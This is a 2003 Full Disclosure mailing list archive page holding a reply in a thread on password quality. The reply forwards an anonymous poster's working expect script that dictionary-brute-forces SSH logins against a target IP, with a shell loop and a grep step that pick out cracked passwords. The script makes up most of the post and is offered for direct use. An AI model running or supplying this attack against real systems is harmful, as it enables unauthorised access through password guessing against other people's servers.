Full Disclosure mailing list archives
Re: Password quality?
From: "Larry W. Cashdollar" <lwc () vapid ath cx>
Date: Wed, 10 Dec 2003 10:05:16 -0500 (EST)
I have been asked to forward this to the list anonymously. ---------- Forwarded message ---------- Date: Wed, 10 Dec 2003 09:34:31 -0500 (EST) To: Larry W. Cashdollar <lwc () vapid ath cx> Cc: "[X-UNKNOWN] Kristian K?hntopp" <kris () koehntopp de> Subject: Re: [Full-disclosure] Password quality? Hey guys, If you want to try the "expect" route, you can use the script below... but, yes, it is slow...would be much quicker if someone modified a ssh-client in C ... ;-) ---cut #!/usr/bin/expect -f # by anonymous # dorky way to brute force ssh passwd # from command prompt do a # for i in `cat PASSWD_FILE`; do ./ssh_brute.expect $i IPADDRESS >> # ssh_rezults; done # where PASSWD_FILE is your dictionary file and IPADDRESS is (duh) the IP # address # then run # grep "SNAGGED" ssh_rezults set timeout 5 set passwd [lindex $argv 0] set host [lindex $argv 1] spawn ssh $host expect "password:" send -- "$passwd\n" expect { "assword" { exit 0 } "enied" { exit 0 } "#" { send_user "SNAGGED $passwd\n" } timeout { exit 254 } eof { exit 253 } } exit 0 ---cut _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Password quality? Kristian Köhntopp (Dec 10)
- Re: Password quality? Larry W. Cashdollar (Dec 10)
- Re: Password quality? Holger van Lengerich (Dec 10)
- Re: Password quality? petard (Dec 10)
- Re: Password quality? the1 (Dec 10)
- <Possible follow-ups>
- Re: Password quality? Larry W. Cashdollar (Dec 10)
- Re: Password quality? Kristian Köhntopp (Dec 10)
- Re: Password quality? Larry W. Cashdollar (Dec 10)